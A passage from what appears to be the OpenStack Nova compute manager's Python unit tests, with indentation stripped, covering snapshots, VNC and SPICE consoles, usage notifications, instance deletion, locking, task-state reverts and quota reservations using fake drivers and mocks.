called = {'count': 0}
def fake_driver_reset_network(self, instance):
called['count'] += 1
self.stubs.Set(nova.virt.fake.FakeDriver, 'reset_network',
fake_driver_reset_network)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.compute.reset_network(self.context,
instance=self._objectify(instance))
self.assertEqual(called['count'], 1)
self.compute.terminate_instance(self.context, instance=instance)
def test_live_snapshot(self):
# Ensure instance can be live_snapshotted.
instance = jsonutils.to_primitive(self._create_fake_instance())
name = "myfakesnapshot"
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.IMAGE_LIVE_SNAPSHOT})
self.compute.live_snapshot_instance(self.context, name,
instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_live_snapshot_fails(self):
# Ensure task_state is set to None if snapshot fails.
def fake_live_snapshot(*args, **kwargs):
raise test.TestingException()
self.fake_image_delete_called = False
def fake_delete(self_, context, image_id):
self.fake_image_delete_called = True
self.stubs.Set(self.compute.driver, 'live_snapshot',
fake_live_snapshot)
fake_image.stub_out_image_service(self.stubs)
self.stubs.Set(fake_image._FakeImageService, 'delete', fake_delete)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
db.instance_update(self.context, instance['uuid'],
{"task_state": task_states.IMAGE_LIVE_SNAPSHOT})
self.assertRaises(test.TestingException,
self.compute.live_snapshot_instance,
self.context, "failing_snapshot", instance=instance)
self.assertTrue(self.fake_image_delete_called)
self._assert_state({'task_state': None})
self.compute.terminate_instance(self.context, instance=instance)
def _get_snapshotting_instance(self):
# Ensure instance can be snapshotted.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
instance = db.instance_update(
self.context, instance['uuid'],
{"task_state": task_states.IMAGE_SNAPSHOT})
return self._objectify(instance)
def test_snapshot(self):
inst_obj = self._get_snapshotting_instance()
self.compute.snapshot_instance(self.context, image_id='fakesnap',
instance=inst_obj)
def test_snapshot_no_image(self):
inst_obj = self._get_snapshotting_instance()
inst_obj.image_ref = ''
inst_obj.save()
self.compute.snapshot_instance(self.context, image_id='fakesnap',
instance=inst_obj)
def _test_snapshot_fails(self, raise_during_cleanup):
def fake_snapshot(*args, **kwargs):
raise test.TestingException()
self.fake_image_delete_called = False
def fake_delete(self_, context, image_id):
self.fake_image_delete_called = True
if raise_during_cleanup:
raise Exception()
self.stubs.Set(self.compute.driver, 'snapshot', fake_snapshot)
fake_image.stub_out_image_service(self.stubs)
self.stubs.Set(fake_image._FakeImageService, 'delete', fake_delete)
inst_obj = self._get_snapshotting_instance()
self.assertRaises(test.TestingException,
self.compute.snapshot_instance,
self.context, image_id='fakesnap',
instance=inst_obj)
self.assertTrue(self.fake_image_delete_called)
self._assert_state({'task_state': None})
def test_snapshot_fails(self):
self._test_snapshot_fails(False)
def test_snapshot_fails_cleanup_ignores_exception(self):
self._test_snapshot_fails(True)
def test_snapshot_handles_cases_when_instance_is_deleted(self):
inst_obj = self._get_snapshotting_instance()
inst_obj.task_state = task_states.DELETING
inst_obj.save()
self.compute.snapshot_instance(self.context, image_id='fakesnap',
instance=inst_obj)
def test_snapshot_handles_cases_when_instance_is_not_found(self):
inst_obj = self._get_snapshotting_instance()
inst_obj2 = instance_obj.Instance.get_by_uuid(self.context,
inst_obj.uuid)
inst_obj2.destroy()
self.compute.snapshot_instance(self.context, image_id='fakesnap',
instance=inst_obj)
def _assert_state(self, state_dict):
"""Assert state of VM is equal to state passed as parameter."""
instances = db.instance_get_all(self.context)
self.assertEqual(len(instances), 1)
if 'vm_state' in state_dict:
self.assertEqual(state_dict['vm_state'], instances[0]['vm_state'])
if 'task_state' in state_dict:
self.assertEqual(state_dict['task_state'],
instances[0]['task_state'])
if 'power_state' in state_dict:
self.assertEqual(state_dict['power_state'],
instances[0]['power_state'])
def test_console_output(self):
# Make sure we can get console output from instance.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
output = self.compute.get_console_output(self.context,
instance=instance)
self.assertEqual(output, 'FAKE CONSOLE OUTPUT\nANOTHER\nLAST LINE')
self.compute.terminate_instance(self.context, instance=instance)
def test_console_output_tail(self):
# Make sure we can get console output from instance.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
output = self.compute.get_console_output(self.context,
instance=instance, tail_length=2)
self.assertEqual(output, 'ANOTHER\nLAST LINE')
self.compute.terminate_instance(self.context, instance=instance)
def test_novnc_vnc_console(self):
# Make sure we can a vnc console for an instance.
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
# Try with the full instance
console = self.compute.get_vnc_console(self.context, 'novnc',
instance=instance)
self.assertTrue(console)
self.compute.terminate_instance(self.context, instance=instance)
def test_validate_console_port_vnc(self):
self.flags(vnc_enabled=True)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
def fake_driver_get_console(*args, **kwargs):
return {'host': "fake_host", 'port': "5900",
'internal_access_path': None}
self.stubs.Set(self.compute.driver, "get_vnc_console",
fake_driver_get_console)
self.assertTrue(self.compute.validate_console_port(self.context,
instance,
"5900",
"novnc"))
def test_validate_console_port_spice(self):
self.flags(vnc_enabled=True)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
def fake_driver_get_console(*args, **kwargs):
return {'host': "fake_host", 'port': "5900",
'internal_access_path': None}
self.stubs.Set(self.compute.driver, "get_spice_console",
fake_driver_get_console)
self.assertTrue(self.compute.validate_console_port(self.context,
instance,
"5900",
"spice-html5"))
def test_validate_console_port_wrong_port(self):
self.flags(vnc_enabled=True)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
def fake_driver_get_console(*args, **kwargs):
return {'host': "fake_host", 'port': "5900",
'internal_access_path': None}
self.stubs.Set(self.compute.driver, "get_vnc_console",
fake_driver_get_console)
self.assertFalse(self.compute.validate_console_port(self.context,
instance,
"wrongport",
"spice-html5"))
def test_xvpvnc_vnc_console(self):
# Make sure we can a vnc console for an instance.
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
console = self.compute.get_vnc_console(self.context, 'xvpvnc',
instance=instance)
self.assertTrue(console)
self.compute.terminate_instance(self.context, instance=instance)
def test_invalid_vnc_console_type(self):
# Raise useful error if console type is an unrecognised string.
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(rpc_common.ClientException,
self.compute.get_vnc_console,
self.context, 'invalid', instance=instance)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.ConsoleTypeInvalid,
self.compute.get_vnc_console,
self.context, 'invalid', instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_missing_vnc_console_type(self):
# Raise useful error is console type is None.
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(rpc_common.ClientException,
self.compute.get_vnc_console,
self.context, None, instance=instance)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.ConsoleTypeInvalid,
self.compute.get_vnc_console,
self.context, None, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_spicehtml5_spice_console(self):
# Make sure we can a spice console for an instance.
self.flags(vnc_enabled=False)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
# Try with the full instance
console = self.compute.get_spice_console(self.context, 'spice-html5',
instance=instance)
self.assertTrue(console)
self.compute.terminate_instance(self.context, instance=instance)
def test_invalid_spice_console_type(self):
# Raise useful error if console type is an unrecognised string
self.flags(vnc_enabled=False)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(rpc_common.ClientException,
self.compute.get_spice_console,
self.context, 'invalid', instance=instance)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.ConsoleTypeInvalid,
self.compute.get_spice_console,
self.context, 'invalid', instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_missing_spice_console_type(self):
# Raise useful error is console type is None
self.flags(vnc_enabled=False)
self.flags(enabled=True, group='spice')
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(rpc_common.ClientException,
self.compute.get_spice_console,
self.context, None, instance=instance)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.ConsoleTypeInvalid,
self.compute.get_spice_console,
self.context, None, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_vnc_console_instance_not_ready(self):
self.flags(vnc_enabled=True)
self.flags(enabled=False, group='spice')
instance = self._create_fake_instance(
params={'vm_state': vm_states.BUILDING})
instance = jsonutils.to_primitive(instance)
def fake_driver_get_console(*args, **kwargs):
raise exception.InstanceNotFound(instance_id=instance['uuid'])
self.stubs.Set(self.compute.driver, "get_vnc_console",
fake_driver_get_console)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.InstanceNotReady,
self.compute.get_vnc_console, self.context, 'novnc',
instance=instance)
def test_spice_console_instance_not_ready(self):
self.flags(vnc_enabled=False)
self.flags(enabled=True, group='spice')
instance = self._create_fake_instance(
params={'vm_state': vm_states.BUILDING})
instance = jsonutils.to_primitive(instance)
def fake_driver_get_console(*args, **kwargs):
raise exception.InstanceNotFound(instance_id=instance['uuid'])
self.stubs.Set(self.compute.driver, "get_spice_console",
fake_driver_get_console)
self.compute = utils.ExceptionHelper(self.compute)
self.assertRaises(exception.InstanceNotReady,
self.compute.get_spice_console, self.context, 'spice-html5',
instance=instance)
def test_diagnostics(self):
# Make sure we can get diagnostics for an instance.
expected_diagnostic = {'cpu0_time': 17300000000,
'memory': 524288,
'vda_errors': -1,
'vda_read': 262144,
'vda_read_req': 112,
'vda_write': 5778432,
'vda_write_req': 488,
'vnet1_rx': 2070139,
'vnet1_rx_drop': 0,
'vnet1_rx_errors': 0,
'vnet1_rx_packets': 26701,
'vnet1_tx': 140208,
'vnet1_tx_drop': 0,
'vnet1_tx_errors': 0,
'vnet1_tx_packets': 662,
}
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
diagnostics = self.compute.get_diagnostics(self.context,
instance=instance)
self.assertEqual(diagnostics, expected_diagnostic)
self.compute.terminate_instance(self.context, instance=instance)
def test_add_fixed_ip_usage_notification(self):
def dummy(*args, **kwargs):
pass
self.stubs.Set(network_api.API, 'add_fixed_ip_to_instance',
dummy)
self.stubs.Set(nova.compute.manager.ComputeManager,
'inject_network_info', dummy)
self.stubs.Set(nova.compute.manager.ComputeManager,
'reset_network', dummy)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 0)
self.compute.add_fixed_ip_to_instance(self.context, network_id=1,
instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
self.compute.terminate_instance(self.context, instance=instance)
def test_remove_fixed_ip_usage_notification(self):
def dummy(*args, **kwargs):
pass
self.stubs.Set(network_api.API, 'remove_fixed_ip_from_instance',
dummy)
self.stubs.Set(nova.compute.manager.ComputeManager,
'inject_network_info', dummy)
self.stubs.Set(nova.compute.manager.ComputeManager,
'reset_network', dummy)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 0)
self.compute.remove_fixed_ip_from_instance(self.context, 1,
instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
self.compute.terminate_instance(self.context, instance=instance)
def test_run_instance_usage_notification(self):
# Ensure run instance generates appropriate usage notification.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
inst_ref = db.instance_get_by_uuid(self.context, instance_uuid)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type, 'compute.instance.create.start')
self.assertEquals(msg.payload['image_name'], 'fake_name')
# The last event is the one with the sugar in it.
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.priority, 'INFO')
self.assertEquals(msg.event_type, 'compute.instance.create.end')
payload = msg.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['image_name'], 'fake_name')
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], inst_ref['uuid'])
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
flavor_id = flavors.get_flavor_by_name('m1.tiny')['flavorid']
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertEquals(payload['state'], 'active')
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
self.assertTrue('fixed_ips' in payload)
self.assertTrue(payload['launched_at'])
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
self.assertEqual('Success', payload['message'])
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(inst_ref))
def test_run_instance_end_notification_on_abort(self):
# Test that an end notif is sent if the build is aborted
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
def build_inst_abort(*args, **kwargs):
raise exception.BuildAbortException(reason="already deleted",
instance_uuid=instance_uuid)
self.stubs.Set(self.compute, '_build_instance', build_inst_abort)
self.compute.run_instance(self.context, instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type, 'compute.instance.create.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type, 'compute.instance.create.end')
self.assertEquals('INFO', msg.priority)
payload = msg.payload
message = payload['message']
self.assertTrue(message.find("already deleted") != -1)
def test_run_instance_error_notification_on_reschedule(self):
# Test that error notif is sent if the build got rescheduled
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
def build_inst_fail(*args, **kwargs):
raise exception.RescheduledException(instance_uuid=instance_uuid,
reason="something bad happened")
self.stubs.Set(self.compute, '_build_instance', build_inst_fail)
self.compute.run_instance(self.context, instance=instance)
self.assertTrue(len(fake_notifier.NOTIFICATIONS) >= 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type, 'compute.instance.create.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type, 'compute.instance.create.error')
self.assertEquals('ERROR', msg.priority)
payload = msg.payload
message = payload['message']
self.assertTrue(message.find("something bad happened") != -1)
def test_run_instance_error_notification_on_failure(self):
# Test that error notif is sent if build fails hard
instance = jsonutils.to_primitive(self._create_fake_instance())
def build_inst_fail(*args, **kwargs):
raise test.TestingException("i'm dying")
self.stubs.Set(self.compute, '_build_instance', build_inst_fail)
self.assertRaises(test.TestingException, self.compute.run_instance,
self.context, instance=instance)
self.assertTrue(len(fake_notifier.NOTIFICATIONS) >= 2)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.event_type, 'compute.instance.create.start')
msg = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg.event_type, 'compute.instance.create.error')
self.assertEquals('ERROR', msg.priority)
payload = msg.payload
message = payload['message']
self.assertTrue(message.find("i'm dying") != -1)
def test_terminate_usage_notification(self):
# Ensure terminate_instance generates correct usage notification.
old_time = datetime.datetime(2012, 4, 1)
cur_time = datetime.datetime(2012, 12, 21, 12, 21)
timeutils.set_time_override(old_time)
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
fake_notifier.NOTIFICATIONS = []
timeutils.set_time_override(cur_time)
self.compute.terminate_instance(self.context, instance=instance)
self.assertEquals(len(fake_notifier.NOTIFICATIONS), 4)
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEquals(msg.priority, 'INFO')
self.assertEquals(msg.event_type, 'compute.instance.delete.start')
msg1 = fake_notifier.NOTIFICATIONS[1]
self.assertEquals(msg1.event_type, 'compute.instance.shutdown.start')
msg1 = fake_notifier.NOTIFICATIONS[2]
self.assertEquals(msg1.event_type, 'compute.instance.shutdown.end')
msg1 = fake_notifier.NOTIFICATIONS[3]
self.assertEquals(msg1.event_type, 'compute.instance.delete.end')
payload = msg1.payload
self.assertEquals(payload['tenant_id'], self.project_id)
self.assertEquals(payload['user_id'], self.user_id)
self.assertEquals(payload['instance_id'], instance['uuid'])
self.assertEquals(payload['instance_type'], 'm1.tiny')
type_id = flavors.get_flavor_by_name('m1.tiny')['id']
self.assertEquals(str(payload['instance_type_id']), str(type_id))
flavor_id = flavors.get_flavor_by_name('m1.tiny')['flavorid']
self.assertEquals(str(payload['instance_flavor_id']), str(flavor_id))
self.assertTrue('display_name' in payload)
self.assertTrue('created_at' in payload)
self.assertTrue('launched_at' in payload)
self.assertTrue('terminated_at' in payload)
self.assertTrue('deleted_at' in payload)
self.assertEqual(payload['terminated_at'], timeutils.strtime(cur_time))
image_ref_url = glance.generate_image_url(FAKE_IMAGE_REF)
self.assertEquals(payload['image_ref_url'], image_ref_url)
def test_run_instance_existing(self):
# Ensure failure when running an instance that already exists.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.compute.run_instance(self.context, instance=instance)
self.assertRaises(exception.InstanceExists,
self.compute.run_instance,
self.context,
instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_run_instance_queries_macs(self):
# run_instance should ask the driver for node mac addresses and pass
# that to the network_api in use.
fake_network.unset_stub_network_methods(self.stubs)
instance = jsonutils.to_primitive(self._create_fake_instance())
macs = set(['01:23:45:67:89:ab'])
self.mox.StubOutWithMock(self.compute.network_api,
"allocate_for_instance")
self.compute.network_api.allocate_for_instance(
mox.IgnoreArg(),
mox.IgnoreArg(),
requested_networks=None,
vpn=False, macs=macs,
security_groups=[], dhcp_options=None).AndReturn(
fake_network.fake_get_instance_nw_info(self.stubs, 1, 1))
self.mox.StubOutWithMock(self.compute.driver, "macs_for_instance")
self.compute.driver.macs_for_instance(instance).AndReturn(macs)
self.mox.ReplayAll()
self.compute.run_instance(self.context, instance=instance)
def test_instance_set_to_error_on_uncaught_exception(self):
# Test that instance is set to error state when exception is raised.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.mox.StubOutWithMock(self.compute.network_api,
"allocate_for_instance")
self.mox.StubOutWithMock(self.compute.network_api,
"deallocate_for_instance")
self.compute.network_api.allocate_for_instance(
mox.IgnoreArg(),
mox.IgnoreArg(),
requested_networks=None,
vpn=False, macs=None,
security_groups=[], dhcp_options=None
).AndRaise(rpc_common.RemoteError())
self.compute.network_api.deallocate_for_instance(
mox.IgnoreArg(),
mox.IgnoreArg(),
requested_networks=None).MultipleTimes()
fake_network.unset_stub_network_methods(self.stubs)
self.mox.ReplayAll()
self.assertRaises(rpc_common.RemoteError,
self.compute.run_instance,
self.context,
instance=instance)
instance = db.instance_get_by_uuid(context.get_admin_context(),
instance['uuid'])
self.assertEqual(vm_states.ERROR, instance['vm_state'])
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def test_delete_instance_succedes_on_volume_fail(self):
instance = self._create_fake_instance_obj()
def fake_cleanup_volumes(context, instance):
raise test.TestingException()
self.stubs.Set(self.compute, '_cleanup_volumes',
fake_cleanup_volumes)
self.compute._delete_instance(self.context, instance=instance,
bdms={})
def test_delete_instance_keeps_net_on_power_off_fail(self):
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.mox.StubOutWithMock(self.compute, '_deallocate_network')
exp = exception.InstancePowerOffFailure(reason='')
self.compute.driver.destroy(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg(),
context=mox.IgnoreArg()).AndRaise(exp)
# mox will detect if _deallocate_network gets called unexpectedly
self.mox.ReplayAll()
instance = self._create_fake_instance()
self.assertRaises(exception.InstancePowerOffFailure,
self.compute._delete_instance,
self.context,
instance=jsonutils.to_primitive(instance),
bdms={})
def test_delete_instance_loses_net_on_other_fail(self):
self.mox.StubOutWithMock(self.compute.driver, 'destroy')
self.mox.StubOutWithMock(self.compute, '_deallocate_network')
exp = test.TestingException()
self.compute.driver.destroy(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg(),
context=mox.IgnoreArg()).AndRaise(exp)
self.compute._deallocate_network(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.mox.ReplayAll()
instance = self._create_fake_instance()
self.assertRaises(test.TestingException,
self.compute._delete_instance,
self.context,
instance=jsonutils.to_primitive(instance),
bdms={})
def test_delete_instance_deletes_console_auth_tokens(self):
instance = self._create_fake_instance_obj()
self.flags(vnc_enabled=True)
self.tokens_deleted = False
def fake_delete_tokens(*args, **kwargs):
self.tokens_deleted = True
cauth_rpcapi = self.compute.consoleauth_rpcapi
self.stubs.Set(cauth_rpcapi, 'delete_tokens_for_instance',
fake_delete_tokens)
self.compute._delete_instance(self.context, instance=instance,
bdms={})
self.assertTrue(self.tokens_deleted)
def test_delete_instance_deletes_console_auth_tokens_cells(self):
instance = self._create_fake_instance_obj()
self.flags(vnc_enabled=True)
self.flags(enable=True, group='cells')
self.tokens_deleted = False
def fake_delete_tokens(*args, **kwargs):
self.tokens_deleted = True
cells_rpcapi = self.compute.cells_rpcapi
self.stubs.Set(cells_rpcapi, 'consoleauth_delete_tokens',
fake_delete_tokens)
self.compute._delete_instance(self.context, instance=instance,
bdms={})
self.assertTrue(self.tokens_deleted)
def test_instance_termination_exception_sets_error(self):
"""Test that we handle InstanceTerminationFailure
which is propagated up from the underlying driver.
"""
instance = self._create_fake_instance_obj()
def fake_delete_instance(context, instance, bdms,
reservations=None):
raise exception.InstanceTerminationFailure(reason='')
self.stubs.Set(self.compute, '_delete_instance',
fake_delete_instance)
self.compute.terminate_instance(self.context, instance=instance)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.ERROR)
def test_network_is_deallocated_on_spawn_failure(self):
# When a spawn fails the network must be deallocated.
instance = jsonutils.to_primitive(self._create_fake_instance())
self.mox.StubOutWithMock(self.compute, "_prep_block_device")
self.compute._prep_block_device(
mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg()).AndRaise(rpc.common.RemoteError('', '', ''))
self.mox.ReplayAll()
self.assertRaises(rpc.common.RemoteError,
self.compute.run_instance,
self.context, instance=instance)
self.compute.terminate_instance(self.context, instance=instance)
def test_lock(self):
# FIXME(comstud): This test is such crap. This is testing
# compute API lock functionality in a test class for the compute
# manager by running an instance. Hello? We should just have
# unit tests in test_compute_api that test the check_instance_lock
# decorator and make sure that appropriate compute_api methods
# have the decorator.
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
non_admin_context = context.RequestContext(None,
None,
is_admin=False)
def check_task_state(task_state):
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['task_state'], task_state)
# should fail with locked nonadmin context
inst_obj = instance_obj.Instance.get_by_uuid(self.context,
instance['uuid'])
self.compute_api.lock(self.context, inst_obj)
self.assertRaises(exception.InstanceIsLocked,
self.compute_api.reboot,
non_admin_context, inst_obj, 'SOFT')
check_task_state(None)
# should fail with invalid task state
self.compute_api.unlock(self.context, inst_obj)
instance = db.instance_update(self.context, instance_uuid,
{'task_state': task_states.REBOOTING})
inst_obj.refresh()
self.assertRaises(exception.InstanceInvalidState,
self.compute_api.reboot,
non_admin_context, inst_obj, 'SOFT')
check_task_state(task_states.REBOOTING)
# should succeed with admin context
instance = db.instance_update(self.context, instance_uuid,
{'task_state': None})
inst_obj.refresh()
self.compute_api.reboot(self.context, inst_obj, 'SOFT')
check_task_state(task_states.REBOOTING)
self.compute.terminate_instance(self.context,
instance=jsonutils.to_primitive(instance))
def _check_locked_by(self, instance_uuid, locked_by):
instance = db.instance_get_by_uuid(self.context, instance_uuid)
self.assertEqual(instance['locked'], locked_by != None)
self.assertEqual(instance['locked_by'], locked_by)
return instance
def test_override_owner_lock(self):
# FIXME(comstud): This test is such crap. This is testing
# compute API lock functionality in a test class for the compute
# manager by running an instance. Hello? We should just have
# unit tests in test_compute_api that test the check_instance_lock
# decorator and make sure that appropriate compute_api methods
# have the decorator.
admin_context = context.RequestContext('admin-user',
'admin-project',
is_admin=True)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
# Ensure that an admin can override the owner lock
inst_obj = self._objectify(instance)
self.compute_api.lock(self.context, inst_obj)
self._check_locked_by(instance_uuid, 'owner')
self.compute_api.unlock(admin_context, inst_obj)
self._check_locked_by(instance_uuid, None)
def test_upgrade_owner_lock(self):
# FIXME(comstud): This test is such crap. This is testing
# compute API lock functionality in a test class for the compute
# manager by running an instance. Hello? We should just have
# unit tests in test_compute_api that test the check_instance_lock
# decorator and make sure that appropriate compute_api methods
# have the decorator.
admin_context = context.RequestContext('admin-user',
'admin-project',
is_admin=True)
instance = jsonutils.to_primitive(self._create_fake_instance())
instance_uuid = instance['uuid']
self.compute.run_instance(self.context, instance=instance)
# Ensure that an admin can upgrade the lock and that
# the owner can no longer unlock
inst_obj = self._objectify(instance)
self.compute_api.lock(self.context, inst_obj)
self.compute_api.lock(admin_context, inst_obj)
self._check_locked_by(instance_uuid, 'admin')
inst_obj.refresh()
self.assertRaises(exception.PolicyNotAuthorized,
self.compute_api.unlock,
self.context, inst_obj)
self._check_locked_by(instance_uuid, 'admin')
self.compute_api.unlock(admin_context, inst_obj)
self._check_locked_by(instance_uuid, None)
def _test_state_revert(self, instance, operation, pre_task_state,
kwargs=None):
if kwargs is None:
kwargs = {}
# The API would have set task_state, so do that here to test
# that the state gets reverted on failure
db.instance_update(self.context, instance['uuid'],
{"task_state": pre_task_state})
orig_elevated = self.context.elevated
orig_notify = self.compute._notify_about_instance_usage
def _get_an_exception(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.context, 'elevated', _get_an_exception)
self.stubs.Set(self.compute,
'_notify_about_instance_usage', _get_an_exception)
func = getattr(self.compute, operation)
self.assertRaises(test.TestingException,
func, self.context, instance=instance, **kwargs)
# self.context.elevated() is called in tearDown()
self.stubs.Set(self.context, 'elevated', orig_elevated)
self.stubs.Set(self.compute,
'_notify_about_instance_usage', orig_notify)
# Fetch the instance's task_state and make sure it reverted to None.
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance["task_state"], None)
def test_state_revert(self):
# ensure that task_state is reverted after a failed operation.
actions = [
("reboot_instance", task_states.REBOOTING),
("stop_instance", task_states.POWERING_OFF),
("start_instance", task_states.POWERING_ON),
("terminate_instance", task_states.DELETING),
("power_off_instance", task_states.POWERING_OFF),
("power_on_instance", task_states.POWERING_ON),
("soft_delete_instance", task_states.SOFT_DELETING),
("restore_instance", task_states.RESTORING),
("rebuild_instance", task_states.REBUILDING,
{'orig_image_ref': None,
'image_ref': None,
'injected_files': [],
'new_pass': ''}),
("set_admin_password", task_states.UPDATING_PASSWORD),
("rescue_instance", task_states.RESCUING),
("unrescue_instance", task_states.UNRESCUING),
("revert_resize", task_states.RESIZE_REVERTING,
{'migration_id': None}),
("prep_resize", task_states.RESIZE_PREP,
{'image': {},
'instance_type': {}}),
("resize_instance", task_states.RESIZE_PREP,
{'migration_id': None,
'image': {}}),
("pause_instance", task_states.PAUSING),
("unpause_instance", task_states.UNPAUSING),
("suspend_instance", task_states.SUSPENDING),
("resume_instance", task_states.RESUMING),
]
want_objects = ['stop_instance', 'start_instance',
'terminate_instance', 'soft_delete_instance',
'revert_resize', 'confirm_resize'
]
instance = self._create_fake_instance()
inst_obj = instance_obj.Instance._from_db_object(
self.context, instance_obj.Instance(), instance,
expected_attrs=instance_obj.INSTANCE_DEFAULT_FIELDS)
for operation in actions:
if operation[0] in want_objects:
self._test_state_revert(inst_obj, *operation)
else:
self._test_state_revert(instance, *operation)
def _ensure_quota_reservations_committed(self, expect_project=False,
expect_user=False):
"""Mock up commit of quota reservations."""
reservations = list('fake_res')
self.mox.StubOutWithMock(nova.quota.QUOTAS, 'commit')
nova.quota.QUOTAS.commit(mox.IgnoreArg(), reservations,
project_id=(expect_project and
self.context.project_id or
None),
user_id=(expect_user and
self.context.user_id or
None))
self.mox.ReplayAll()
return reservations
def _ensure_quota_reservations_rolledback(self, expect_project=False,
expect_user=False):
"""Mock up rollback of quota reservations."""
reservations = list('fake_res')
self.mox.StubOutWithMock(nova.quota.QUOTAS, 'rollback')
nova.quota.QUOTAS.rollback(mox.IgnoreArg(), reservations,
project_id=(expect_project and
self.context.project_id or
None),
user_id=(expect_user and
self.context.user_id or
None))
self.mox.ReplayAll()
return reservations
def test_quotas_succesful_delete(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
resvs = self._ensure_quota_reservations_committed(True, True)
self.compute.terminate_instance(self.context, instance,
bdms=None, reservations=resvs)
def test_quotas_failed_delete(self):
instance = jsonutils.to_primitive(self._create_fake_instance())
def fake_shutdown_instance(*args, **kwargs):
raise test.TestingException()
self.stubs.Set(self.compute, '_shutdown_instance',
fake_shutdown_instance)
resvs = self._ensure_quota_reservations_rolledback(True, True)
